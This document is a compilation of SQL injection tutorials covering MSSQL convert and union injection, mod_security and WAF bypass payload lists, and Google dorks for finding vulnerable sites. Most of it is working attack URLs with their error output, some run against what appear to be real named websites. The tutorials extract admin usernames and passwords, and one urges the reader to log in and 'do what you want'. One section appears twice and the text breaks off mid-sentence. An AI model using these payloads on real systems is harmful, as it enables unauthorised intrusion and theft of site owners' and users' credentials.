MSSQL Injection Using Convert - Penetration Testing - Bug Bounty Program

 In our Previous Tutorial We Have Discuss About Union Based Injection

Now Let's Come to the Next Part. In this Tutorial You Will Learn About Injecting Site

with Convert Attack. How Actually This Command Work. This command works

between two Data types and we have to give Commands to the Server with Convert

then it will give That Specific Data which we have execute in the Command.

So let's start our injection Manually.

we got A target and let's Check if it's Vulnerable for injecting. So we will Execute the

URL by Adding Single Quote " ' "at the End If the Target Parameter.

http://www.Vuln-Site.com/authorprofile.asp?id=46'

It Gives us Error

ERROR:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the

character string ''.

/authorprofile.asp, line 10

Our Target site is Vulnerable. As we Are Injecting with Convert Attack So we no need

to Go For Counting the Total number Of Columns. We will Directly Execute our

Commands with Convert.

Let's Check The Version.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--

After Executing the Query We Got The Version.

Here is Version:Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15

Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64>

(Build 7601: Service Pack 1)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015

18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT

6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.

/authorprofile.asp, line 10

Now Let's check The Current Database name.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())—

And we Have got The Current Database Name.

This is Current Database Name:museindia

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'museindia' to data type int.

/authorprofile.asp, line 10

As we have get the Version and The Database name. Now Let's move to Getting The

Tables.

This is Our Query for getting the Tables.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

table_name from information_schema.tables))--+

After Executing the Query we have Got The First Table Name.

Table name:about

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'about' to data type int.

/authorprofile.asp, line 10

For Getting the Other Tables from the Database we will add our Previous Table name

Enclosed By Single Quotes with in Small Brackets.

For Example:

and 1=convert(int,(select top 1 table_name from information_schema.tables where

table_name not in

('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+

So Let's Check The Other Tables from the Database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

table_name from information_schema.tables where table_name not in ('about')))--+

And We Have got The Next Table Name

Next Table Name:aucon

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'aucon' to data type int.

/authorprofile.asp, line 10

In this Way we will Continue to Getting Other tables until get Required Table.

Here we Got The Table name: members

Now let's Get the Column names from this Table.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='members'))--+

we have got the First Column name.

This is the First Column Name: memberid

Let's try to get the other Columns as we do the same for getting the other

tables from the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='members' and

column_name not in ('memberid')))--+

So After Getting the Column name The Final Part is To Extracting Data from The

Columns.

This will be Our Final Query !

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top

1OUR_COLUMN_NAME _HERE from OUR_TABLE_NAME_HERE))--+

This query will Print the Data from the Columns on the Webpage.

 MSSQL Union Based Injection Part-2 - Advanced Method

In This Tutorial You Will Learn Some Advanced Method that will help you in Injecting.

In Normal Sites We Do order by and Count Columns Then Prepare UNION BASED

command for Finding Vulnerable Columns but in some Cases We are stuck on

UNION BASED. So for This Tutorial i have Find site for Practice.

First we Will Check the Vulnerability, so we will Usually Add Single Quote ‘at the End

of the Parameter.

http://www.genuinecomputers.in/products.asp?pro=PenDrives'

After Executing The URL it Gives us Error !

As our Target is Vulnerable so Let's our injecting Manually.First Let's check how many

Columns are there. So We will use ORDER BY Command For Counting The Columns.

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1--+

No ERROR !!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 100---+

Again No Error !!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1000---+

Still No Error !!

Let's try String Based Injection.so we will Add Single Quote After the parameter. But

If You have Notice the ERROR RESPONSE it automatically Adding Closed bracket

" ) " in our injection . So We will Add String with Closed Bracket " ) " after the

Parameter.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 1---+

No Error !! Site Loaded Normally .

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 6---+

Again No Error !!

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 7---+

Here we have got a ERROR !!

ERROR:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 7 is

out of range of the number of items in the select list.

/products.asp, line 131

So There are 6 Total Number of Columns. Now Let's Prepare Our UNION BASED

Command for Finding the Vulnerable Columns.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') union select

1,2,3,4,5,6---+

But Here we Got Error !

ERROR:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the varchar value 'PenDrives' to data type int.

/products.asp, line 131

Although Our Column Count is Correct .The Problem is With The Numbered Values

.So to Bypass this Error Let's add Null Values instead of Numbers and Then Execute

our UNION BASED Query.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') and 1=2 union

select null,null,null,null,null,null---+

Bingooo :p ERROR BYPASSED !!

but we cannot see the Vulnerable columns. So We will check every Column One by

One. First let's check the Version. We will Add @@version in the 1st Column then

again replace it to null and go to the next one.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

@@version,null,null,null,null,null--+

Here we got the Version.

Version:

Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012 13:38:57 Copyright

(c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.2 <X64> (Build

9200: )

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012

13:38:57 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT

6.2 <X64> (Build 9200: ) ' to data type smallint.

/products.asp, line 131

Now Let's Check the Tables from the current Database.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

table_name,null,null,null,null,null from information_Schema.tables--+

Here we got table name

As this is The First Table Name Let's Check the Next one. For Finding the other tables

we will add this Part in our Query.

where table_name not in ('PREVIOUS_TABLE_1','PREVIOUS_TABLE_2')

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

table_name,null,null,null,null,null from information_Schema.tables where table_name

not in ('products')--+

After getting the Tables next we will check the Columns.so we will use this Query for

Getting the Columns from the Table.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

column_name,null,null,null,null,null from information_Schema.columns where

table_name='OUR_TABLE_NAME_HERE'--+

As we have got the First Column. So Checking The Other Columns we will add this

Part in Our Query.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

column_name,null,null,null,null,null from information_Schema.columns where

table_name='OUR_TABLE_NAME_HERE' where column_name not in

('PREVIOUS_COLUMN_1','PREVIOUS_COLUMN_2')--+

So After Getting The Table and the Columns Final Part is To Extracting Data from the

Columns.

So This is The Final Query .

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union

selectOUR_COLUMN_HERE,null,null,null,null,null from OUR_TABLE_HERE--+

 MSSQL Union Based Injection

In MySQL Database. Now Let's Come to injecting MSSQL Database.

In this Tutorial We Will Discuss About MSSQL Union Based injection. Although

MSSQL injection is Similar to MySQL but Not the Same as MySQL Is Easy than

MSSQL Injection.

So Let's Start Our injecting.

We have a Target site. First we Have to Check if It's Vulnerable to MSSQL injection or

not. For This Purpose, we Will add single Quote (') at the end of the Parameter.

Here Let us Say Our Target site is and Add Single Quote ' at the End to check the

Vulnerability:

http://www.AnySite.com/news.asp?id=10'

After executing The Command with single Quote It Gives This Type of Error:

ERROR:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ''.

/news.asp, line 9

So it Mean Our Target Site is Vulnerable to MSSQL injection.

Next we Have to Balance Our Query. Here are Some Comments that we Can Apply

on our Target Site:

http://www.AnySite.com/news.asp?id=10-- Loading Fine !

http://www.AnySite.com/news.asp?id=10--+ Loading Fine !

http://www.AnySite.com/news.asp?id=10%23 Loading Fine !

http://www.AnySite.com/news.asp?id=10; Loading Fine !

So as You know That Each Site Has Different WAF so use there Different Comments

for Balancing The Query.After balancing The Query now Next we Have to Count

Columns. So we Will Normally use ORDER BY command For counting Columns

Purpose.

http://www.AnySite.com/news.asp?id=10 order by 1--+ Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 5--+ Again Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 15--+ Again Site Loaded Normally

and there is no any kind of error !

http://www.AnySite.com/news.asp?id=10 order by 16--+ Here we have Got Error !!

Error:

Microsoft OLE DB Provider for SQL Server error '80040e14'

The ORDER BY position number 16 is out of range of the number of items in the

select list.

/news.asp, line 9

So It Means There are 15 Total Columns. Now Let's Prepare Our UNION BASED

Command. For Finding the Vulnerable Columns we have to False the URL.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

After Executing the UNION BASED command you can see the Vulnerable Columns

Printed on the Webpage.

in my case 5,6,7,8,9 are vulnerable Columns there.

So Now Let's Check the Version. for Finding the Version we will use @@version. We

cannot use Version() here As it Is MSSQL Database Not MySQL Database.

Let's Give Command For Checking The Version:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+

After Executing the Query you can See the Version Printed on The Webpage:

Version:

Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46

Copyright (c) Microsoft Corporation Express Edition with Advanced Services (64-bit)

on Windows NT 6.2 (Build 9200:) (Hypervisor)

Now Let's Check the Current Database Name. so for this we will Give command

db_name() in the Vulnerable Column.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+

and after executing this Command you can see the Database Name Printed Out

there .

Database Name:

bietdb

Here Are some other Functions and There Uses:

USES                                     :                                         FUCTION

@@version                                                                 Current Version

db_name()                             :                             Current Database name

System_user                          :                                 Current User name

User_name()                          :                                 Current User name

current_user()                        :                                  Current User name

Now Next Part Is to get the Tables from the Database. As We cannot use

group_concat Here Therefore We Have to Get the Tables One by One. So this one

Will Be Our Query for Getting the Tables.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+

And You Can See the First Table Name Printed There.

So Admin is the First Table Name Here. But If you want to Get the Other Tables then

use this One Query.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where

table_name not in ('admin')--+

In this admin we will add our Previous Table name to get the Next one. We Will

Continue to do so until Get the table That We Want.

Remember That every Table Name must be in small brackets and being enclosed by

Single Quotes as You Can See This one query.

where table_name not in ('Previous_Table_name_1','Previous_Table_name_2')

So Let's Execute This Query for Getting other Tables in the Database.

so Here is our Second Table in the Database.

Now Let's Get the Columns from the Tables. So this one Will be our Query for the

Columns.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT

1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns

where table_name=('admin')--+

After Executing this Query, you can see The First Column name.

This is First Column in that Table. Let’s Get the Other Columns from that Table. So for

This Purpose we will use This Query.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT

1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns

where table_name=('admin') and columns_name not in ('emp_name')--+

in The RED Part we have to add Previous Column Name to Get the Next one as we

Done This for Getting the TABLES. SO You Can Do it until You get that column name

which you want.

So Let's Execute this Query to Get the other Columns.

You can see the Next Column Name Printed there.

As We Have Get the Columns Name Now Let's Extract data from them. As we Cannot

use group_concat in MSSQL so Will Use + Encoded Value with Single Quotes. So

Our Final Query for Extracting Data From The Columns will be:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT

1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+

And After Executing the Query you can see the username and Password Printed in

the above Picture.

You can do the Same Procedure for Extracting Data from other columns.

MSSQL Union Based Injection

In MySQL Database. Now Let's Come to injecting MSSQL Database.

In this Tutorial We Will Discuss About MSSQL Union Based injection. Although MSSQL injection is Similar to MySQL Not the Same as MySQL Is Easy than MSSQL Injection.

So Let's Start Our injecting.

We have a Target site. First, we Have to Check if It's Vulnerable to MSSQL injection or

not. For This Purpose, we Will add a single Quote (') at the end of the Parameter.

Here Let us Say Our Target site is and Add Single Quote ' at the End to check the

Vulnerability:

http://www.AnySite.com/news.asp?id=10'

After executing The Command with a single Quote It Gives This Type of Error:

ERROR:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ''.

/news.asp, line 9

So it Means Our Target Site is Vulnerable to MSSQL injection.

Next, we Have to Balance Our Query. Here Are Some Comments that we Can Apply

on our Target Site:

http://www.AnySite.com/news.asp?id=10-- Loading Fine!

http://www.AnySite.com/news.asp?id=10--+ Loading Fine !

http://www.AnySite.com/news.asp?id=10%23 Loading Fine !

http://www.AnySite.com/news.asp?id=10; Loading Fine !

So as You know That Each Site Has a Different WAF so use their Different Comments

for Balancing The Query. After balancing The Query now Next we Have to Count Columns. So we Will Normally use the ORDER BY command For counting Columns

Purpose.

http://www.AnySite.com/news.asp?id=10 order by 1--+ Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 5--+ Again Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 15--+ 

Again Site Loaded Normally and there is no kind of error!

http://www.AnySite.com/news.asp?id=10 order by 16--+ 

Here we have Got an Error !!

Error:

Microsoft OLE DB Provider for SQL Server error '80040e14'

The ORDER BY position number 16 is out of range of the number of items in the

select list.

/news.asp, line 9

So It Means There are 15 Total Columns. Now Let's Prepare Our UNION BASED

Command. For Finding the Vulnerable Columns we have to False the URL.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

After Executing the UNION BASED command you can see the Vulnerable Columns

Printed on the Webpage.

in my case 5,6,7,8,9 are vulnerable Columns there.

So Now Let's Check the Version. for Finding the Version we will use @@version. 

We cannot use Version() here As it Is MSSQL Database Not MySQL Database.

Let's Give Command For Checking The Version:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+

After Executing the Query you can See the Version Printed on The Webpage:

Version:

Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46

Copyright (c) Microsoft Corporation Express Edition with Advanced Services (64-bit)

on Windows NT 6.2 (Build 9200:) (Hypervisor)

Now Let's Check the Current Database Name. so for this, we will give the command

db_name() in the Vulnerable Column.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+

and after executing this command you can see the Database Name Printed Out there.

 

Database Name:

bietdb

Here Are some other Functions and There Uses:

USES : FUCTION

@@version Current Version

db_name() : Current Database name

System_user : Current User name

User_name() : Current User name

current_user() : Current User name

Now Next Part Is to get the Tables from the Database. As We cannot use

group_concat Here Therefore We Have to Get the Tables One by One. So this one

Will Be Our Query for Getting the Tables.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+

And You Can See the First Table Name Printed There.

So Admin is the First Table Name Here. But If you want to Get the Other Tables then

use this One Query.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name not in ('admin')--+

In this admin, we will add our Previous Table name to get the Next one. We, Will, continue to do so until Get the table That We Want. Remember That every Table Name must be in small brackets and being enclosed by

Single Quotes as You Can See This one query.

where table_name not in ('Previous_Table_name_1','Previous_Table_name_2')

So Let's Execute This Query for Getting other Tables in the Database.

so Here is our Second Table in the Database.

Now Let's Get the Columns from the Tables. So this one Will be our Query for the

Columns.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin')--+

After Executing this Query, you can see The First Column name.

This is First Column in that Table. Let’s Get the Other Columns from that Table. So for

For this purpose, we will use This Query.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin') and columns_name not in ('emp_name')--+

in The RED Part, we have to add the Previous Column Name to Get the Next one as we are Done with This for Getting the TABLES. SO You Can Do it until You get that column name that you want. So Let's Execute this Query to Get the other Columns. You can see the Next Column Name Printed there.

As We Have to Get the Columns Name Now Let's Extract data from them. As we Cannot use group_concat in MSSQL so Will Use + Encoded Value with Single Quotes. So Our Final Query for Extracting Data From The Columns will be:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+

And After Executing the Query you can see the username and Password Printed in the above Picture. You can do the Same Procedure for Extracting Data from other columns.

Union Based SQL Injection (Mod_Security)

What is Mod_Security?

ModSecurity is an open-source web-based firewall application (or WAF) supported by different web servers: Apache, Nginx and IIS. Usage. The module is configured to protect web applications from various attacks

This topic is similar as Manual Sql Injection. But mod_security is protected to hack websites. You can see in this screenshot

Now In this tutorial we can learn how to bypass mod_security

First we need one Target Website

In My case I am using this website:

http://www.legion.com.pk

Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this:

Code:

http://www.legion.com.pk/pages.php?ID=18 order by 1--+ (no error)

http://www.legion.com.pk/pages.php?ID=18 order by 2--+ (no error)

http://www.legion.com.pk/pages.php?ID=18 order by 3--+ (no error)

http://www.legion.com.pk/pages.php?ID=18 order by 4--+ (no error)

http://www.legion.com.pk/pages.php?ID=18 order by 5--+ (no error)

http://www.legion.com.pk/pages.php?ID=18 order by 6--+ ( error)

Finding Vulnerable Columns

So now that you got the amount of columns, you're going to want to see which ones you can get data from. You do this by using the "Union+Select" or "Union+All+Select" Function. First, you

add a - in front of your ID Number. It should look like this:

Code:

http://www.legion.com.pk/pages.php?ID=18 union select 1,2,3,4,5--+

but you can see error

Now see how to bypass this security

/*!5000 */ are use to bypass Mod_security

It should look like this:

http://www.legion.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,

3,4,5--+

Getting Table Names

we want to get our tables from the database. It should look like this:

Code:

http://www.legion.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,

3,4,/*!50000gROup_cONcat(table_name,0x0a)*/+from+/*!50000inforMAtion_schema*

/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+

Getting Columns Out Of Tables

It should look like this:

Code:

http://www.legion.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,

3,4,/*!50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/*!50000wHEre*/+/*!50000taBLe_name*/=CHAR(97, 100, 109, 105,110)--+

Getting Data from Columns

Ok, so I see username, and password, and that's what I want.

Now, we just replace a few things.

Code:

http://www.legion.com.pk/pages.php?ID=-18 /*!50000union*/

/*!50000select*/1,2,3,4,/*!50000gROup_cONcat(Username,0x0a,Password)*/from+/*!50000admin*/--+

We got user and password 😏😏

User= admin

Password =admin

Now just find admin page and log in and do what you want to do.

Union Based SQL injection (WAF Bypassing)

What is WAF?

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your

application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Today I am going to discuss Union Based SQL injection and WAF bypassing Techniques. Which when you are testing this SQLi Vulnerability you will face FORBIDDEN page (403 Error). Typically, you can find the vulnerable page, find the column count, and then when you switch to use the UNION SELECT statement you get the errors starting up. This is typically due to the server-side rules that are

filtering out your request. This is often referred to as the Web Application Firewall or WAF, but don’t worry as there are ways we can beat them. You can get pretty creative with the methods used but for now, I will show how to use comments to bypass the filters, sometimes referred to as inline comments or C comments. I will re-use some of my previous examples and assume the following details have

gotten us to where we are now: 

Here Is Our Target.

http://www.targetsite.com/news.php?id=11

Add Single Quote (') at the End Of The URL.

http://www.targetsite.com/news.php?id=11'

And Get MYSQL Error.

Let’s Balance Our Query for Further Injecting.

Some Comments from our Previous Tutorials.

http://www.targetsite.com/news.php?id=11--

http://www.targetsite.com/news.php?id=11--+

http://www.targetsite.com/news.php?id=11-- -

http://www.targetsite.com/news.php?id=11%23

http://www.targetsite.com/news.php?id=11;

 

Here Is A Small Explanation on Balance and Comment in our Injection.

After Balancing Our Query. Next is Count Total Number of Columns

http://www.targetsite.com/news.php?id=11 order by 1--+

No Error!

http://www.targetsite.com/news.php?id=11 order by 3--+

No Error!

http://www.targetsite.com/news.php?id=11 order by 5--+

Again No Error!

http://www.targetsite.com/news.php?id=11 order by 6--+

Here We Get Error!

Unknown column '6' in 'order clause'

Now Try To Find Our Vulnerable Columns.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

If Our Target site Is Protected with WAF. WAF Will Block Our Query and Give Us Mod_Security Error. Now there is no more 403 Forbidden message stopping you and you can see the vulnerable columns displayed on the page. I will re-use my examples and assume columns 2, 4, & 5 are vulnerable. Now that we have the vulnerable columns we can

extract some data, let’s first find some basic info though. We will use CONCAT to grab the current database name, the current user, and the version info, like this:

http://www.targetsite.com/index.php?id=-

725+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5--

(403 Forbidden – WTF?)

  

So Here are some WAF Bypassing Methods.

 /*!%55NiOn*/ /*!%53eLEct*/

 %55nion(%53elect 1,2,3)-- -

 +union+distinct+select+

 +union+distinctROW+select+

 /**//*!12345UNION SELECT*//**/

 /**//*!50000UNION SELECT*//**/

 /**/UNION/**//*!50000SELECT*//**/

 /*!50000UniON SeLeCt*/

 union /*!50000%53elect*/

 +#uNiOn+#sEleCt

 +#1q%0AuNiOn all#qa%0A#%0AsEleCt

 /*!%55NiOn*/ /*!%53eLEct*/

 /*!u%6eion*/ /*!se%6cect*/

 +un/**/ion+se/**/lect

 uni%0bon+se%0blect

 %2f**%2funion%2f**%2fselect

 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 REVERSE(noinu)+REVERSE(tceles)

 /*--*/union/*--*/select/*--*/

 union (/*!/**/ SeleCT */ 1,2,3)

 /*!union*/+/*!select*/

 union+/*!select*/

 /**/union/**/select/**/

 /**/uNIon/**/sEleCt/**/

 /**//*!union*//**//*!select*//**/

 /*!uNIOn*/ /*!SelECt*/

 +union+distinct+select+

 +union+distinctROW+select+

Just Change The Union Select With Following Bypass URLs.

Let’s Continue Our Tutorial.

OK, so now we have commented out our UNION SELECT statement but something is still setting off the filters... it is most likely the CONCAT statement. In some cases, it is possible to bypass filters by simply changing the norm up and re-testing. This can be accomplished by comments or by simply changing CaPiTAliZaTIon, like so:

http://www.targetsite.com/index.php?id=-

725+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5--

(No Errors!!)

Results:

· Version = 5.0.92-community-log

· User = dumbdba@localhost

· Database() = exampleDB

It worked; we now know the current database name, user name, and the version as they are neatly displayed on the page for us. These two techniques can be combined to evade filters throughout your Injections as you will see. Now let us try to get the list of all the databases available, instead of just the current one, like so:

http://www.targetsite.com/index.php?id=-

725+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+IN

FORMATION_SCHEMA.SCHEMATA-- 

(403 Forbidden)

Luckily we know what to do now so start by altering GROUP_CONCAT, same as we did for CONCAT:

http://www.targetsite.com/index.php?id=-

725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INF

ORMATION_SCHEM.SCHEMATA-- 

(No Errors!!)

Results:

· Information_Schema

· exampleDB

This should now show us the available databases! Now let us check for the tables tied to the current database.

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEM.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

(403 Forbidden again)

In some cases, you may have experienced a 403 in the previous step as well, it is due to the fact that oftentimes INFORMATION_SCHEMA or TABLES will be filtered. Again, this changes from site to site based on how it was configured so it could even be

other items but these are the most common. In order to get around the filters, we simply need to use our comments method again, so it looks like this:

http://www.targetsite.com/index.php?id=-

725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.TABLES-- (No Errors!!)

TABLES FOUND: Admin, News, Ads, Users

Now we have all of the tables for the current database displayed on the page without any 403 holdings us back. We can get columns using the same method as we used in the Basic SQLi 101 examples but we will keep our comments and capitalization techniques alive so it gets past the WAF (reminder to also HEX your table names).

http://www.targetsite.com/index.php?id=-

725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--

(No Errors!!)

The page will now display a list of the columns from the Admin table in the

vulnerable column 2 spot on-page. In this example, we will assume we found the

following column names:

· id

· login

· password

· email

OK, now we know the tables and associated columns. It is time to get some data extracted, and it will go the same as it did in the Basic SQLi tutorial, or like this:

http://www.targetsite.com/index.php?id=-

725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a,login,0x3a,password,0x3a,email,0x3a),3,4,5+FROM+Admin—

You will get the Admin details.

Basic Union Based Injection | hackerworld99 | Sqli | SQL Injection

Basic Union Based Injection

First off we need a vulnerable website. Google is the best partner for finding vulnerable sites. we use Google Dork for searching vulnerable websites. Google Dork is the trick to

find the perfect match. But we are going to use “inurl:” command for finding the

vulnerable websites.

[Example of Google Dork :]

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=sa

inurl:games.php?id=

inurl:page.php?file=

[How to use]

Copy one of the above command and paste it into the Google search engine box. Hit enter. You can get a list of websites. We have to visit the websites one by one for

checking the vulnerability.

Vulnerable Sites (With Syntax)

So after you got a vulnerable site, to test if you can inject, add a ' to the end of the

URL.

I'll be using this site

Code:

http://www.easystickersbanners.co.uk/banners.php?categoryid=15

 

Balance SQLi Query Techniques

WELCOME TO THE THIRD PART OF THE BASICS OF SQL FOR SQL INJECTION. AS IN THE LAST PART WE TOOK THIS URL "HTTP://FAKESITE.COM/REPORT.PHP?ID=23" AS AN EXAMPLE AND THEN ASSUMED SOME BASIC QUERIES BY LOOKING AT THE URL AND THEN WE TRIED DIFFERENT INJECTIONS AND LEARNT HOW TO FIGURE OUT WHICH TYPE OF QUERY WE ARE FACING. IN THIS TUTORIAL WE WILL LEARN HOW WE CAN UNDERSTAND WHICH COMMENT TYPE WE SHOULD USE AND WHY AND HOW TO FIND THE NUMBER OF COLUMNS AS DISCUSSED EARLIER FOLLOWING ARE THE DIFFERENT TYPES OF COMMENTS

USED IN SQLI.

well, actually it only depends on the environment and reaction of the application when we try some commenting operators. If you see PHP is used then usually "--" will surely work otherwise you can check "--+" or "# (URL encoded)", else the best option is to try with different types of comments and analyses the input. So what we will do to check is try to close our input with all possibilities like single quote double-quote or brackets etc. and comment rest query and if it works then we can be sure that this comment is working. We will again take the same URL for example

"http://fakesite.com/report.php?id=23" 

so let’s see how can we check for which

comment to use.

so as I showed above test for '--' type comment in the same manner you can check for all commenting types and the one which gives the same output as giving with

"http://fakesite.com/report.php?id=23" 

then that can help you understand the type of internal query along with the comment that you can use. Now as we have understood understanding and knowing the internal query and then finding the type of command we can use. First of all, we will understand the basics of injecting.

Any time anywhere or any application where ever and whenever you are injecting

there are following three basic rules of injecting

[1]. Balance.

[2]. Inject.

[3]. Commenting.

Understanding the first phase "Balance":

In this phase we balance the internal query, for example, lets say after reading the Part

1 and Part 2 we understand that how can we assume and figure out the internal query

used by the application where your input is injected. Let's say we figured out that out

the internal query is "Select * from tablename where id=('23')" so in this case our balance

input should be 23').

The phase of Injection:

In this phase, we inject as per our requirement, and the type of injection we are doing.

The phase of Commenting:

Then the last part of commenting, which we already know. Now check the below image

which will show you all the three parts of injection.

As per the Above Injection, we can assume the internal query to be:

